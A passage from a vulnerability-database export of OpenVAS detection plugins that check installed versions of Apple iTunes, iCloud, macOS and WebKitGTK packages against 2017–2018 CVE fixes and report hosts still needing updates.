http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812285\");\n script_version(\"2019-05-17T13:14:58+0000\");\n script_cve_id(\"CVE-2017-13864\", \"CVE-2017-13866\", \"CVE-2017-13856\", \"CVE-2017-13870\",\n \"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-7160\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 13:14:58 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-28 14:47:56 +0530 (Thu, 28 Dec 2017)\");\n script_name(\"Apple iTunes Security Updates( HT208326 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple memory corruption issues.\n\n - A privacy issue existed in the use of client certificates.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to track users by\n leveraging mishandling of client certificates and also execute arbitrary code\n or cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.7.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.7.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208326\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nituneVer = infos['version'];\npath = infos['location'];\n\n##12.7.2 == 12.7.2.58\nif(version_is_less(version:ituneVer, test_version:\"12.7.2.58\"))\n{\n report = report_fixed_ver(installed_version:ituneVer, fixed_version:\"12.7.2\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:39", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-12-14T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates( HT208328 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-7157"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812258", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812258", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates HT208328)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812258\");\n script_version(\"2019-05-17T13:14:58+0000\");\n script_cve_id(\"CVE-2017-13864\", \"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-13856\",\n \"CVE-2017-13870\", \"CVE-2017-13866\", \"CVE-2017-7160\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 13:14:58 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-14 16:00:28 +0530 (Thu, 14 Dec 2017)\");\n script_name(\"Apple iCloud Security Updates( HT208328 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - A privacy issue existed in the use of client certificates.\n\n - Multiple memory corruption issues.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attacker to track a user and also\n arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208328\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"7.2\"))\n{\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.2\", install_path:path );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-05T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3514-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843406", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843406", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3514_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3514-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843406\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-05 23:56:05 +0100 (Fri, 05 Jan 2018)\");\n script_cve_id(\"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3514-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\n discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\n into viewing a malicious website, a remote attacker could exploit a variety of\n issues related to web browser security, including cross-site scripting attacks,\n denial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 17.10,\n Ubuntu 17.04,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3514-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3514-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.4-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.4-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.4-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.4-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.4-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.4-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.4-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.4-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-12-29T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-06b373d942", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873957", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873957", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_06b373d942_webkitgtk4_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-06b373d942\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873957\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-29 08:05:22 +0100 (Fri, 29 Dec 2017)\");\n script_cve_id(\"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\", \"CVE-2017-13856\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-06b373d942\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-06b373d942\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XRYO7XC2EWI6UKLYRIYC5MTUC27I36GS\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.18.4~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-0ad0e2f390", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873984", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873984", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_0ad0e2f390_webkitgtk4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-0ad0e2f390\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873984\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 07:42:38 +0100 (Wed, 10 Jan 2018)\");\n script_cve_id(\"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\", \"CVE-2017-13856\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-0ad0e2f390\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2017-0ad0e2f390\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4RIN3K3F4NWIVHG7VSEDRVHKMAB2UCC2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.18.4~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:40", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-12-07T00:00:00", "type": "openvas", "title": "Apple MacOSX Security Updates(HT208331)-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798", "CVE-2017-13844", "CVE-2017-13869", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13904", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13833", "CVE-2017-13867", "CVE-2017-10002", "CVE-2017-7173", "CVE-2017-7154", "CVE-2017-13862"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310812401", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812401", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_HT208331_02.nasl 14295 2019-03-18 20:16:46Z cfischer $\n#\n# Apple MacOSX Security Updates(HT208331)-02\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812401\");\n script_version(\"$Revision: 14295 $\");\n script_cve_id(\"CVE-2017-13868\", \"CVE-2017-13869\", \"CVE-2017-3735\", \"CVE-2017-13855\",\n\t\t\"CVE-2017-13844\", \"CVE-2017-9798\", \"CVE-2017-13847\", \"CVE-2017-13833\",\n\t\t\"CVE-2017-10002\", \"CVE-2017-13867\", \"CVE-2017-13862\", \"CVE-2017-7172\",\n \"CVE-2017-1000254\", \"CVE-2017-15422\", \"CVE-2017-7159\", \"CVE-2017-7162\",\n \"CVE-2017-13904\", \"CVE-2017-7173\", \"CVE-2017-7154\");\n script_bugtraq_id(100515, 100872, 101946);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 21:16:46 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:36 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331)-02\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update includes,\n\n - A validation issue was addressed with improved input sanitization.\n\n - An out-of-bounds read issue existed in X.509 IPAddressFamily parsing.\n\n - A type confusion issue was addressed with improved memory handling.\n\n - A memory corruption issue was addressed with improved memory handling.\n\n - Multiple issues were addressed by updating to version 2.4.28.\n\n - Multiple memory corruption issues were addressed through improved state management.\n\n - An out-of-bounds read was addressed with improved bounds checking.\n\n - An out-of-bounds read issue existed in the FTP PWD response parsing.\n\n - An integer overflow error.\n\n - An input validation issue existed in the kernel.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to read restricted memory, execute arbitrary code with system\n privileges.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions,\n 10.13.x through 10.13.1, 10.12.x through 10.12.6, 10.11.x through 10.11.6\");\n\n script_tag(name:\"solution\", value:\"Apply the appropriate security patch from\n the reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[1-3]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[1-3]\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nbuildVer = get_kb_item(\"ssh/login/osx_build\");\n\nif(osVer =~ \"^10\\.11\")\n{\n if(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.11.6\")\n {\n if(osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G18013\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nif(osVer =~ \"^10\\.12\")\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.12.6\")\n {\n if(osVer == \"10.12.6\" && version_is_less(version:buildVer, test_version:\"16G1114\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nelse if(osVer == \"10.13.1\"){\n fix = \"10.13.2\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-31T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3551-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-7165", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-13884", "CVE-2018-4088", "CVE-2018-4096", "CVE-2017-13885"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843437", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843437", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3551_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3551-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843437\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-31 07:54:47 +0100 (Wed, 31 Jan 2018)\");\n script_cve_id(\"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2017-7153\", \"CVE-2017-7160\",\n \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2017-13884\", \"CVE-2017-13885\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3551-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered in\n the WebKitGTK+ Web and JavaScript engines. If a user were tricked in to opening\n 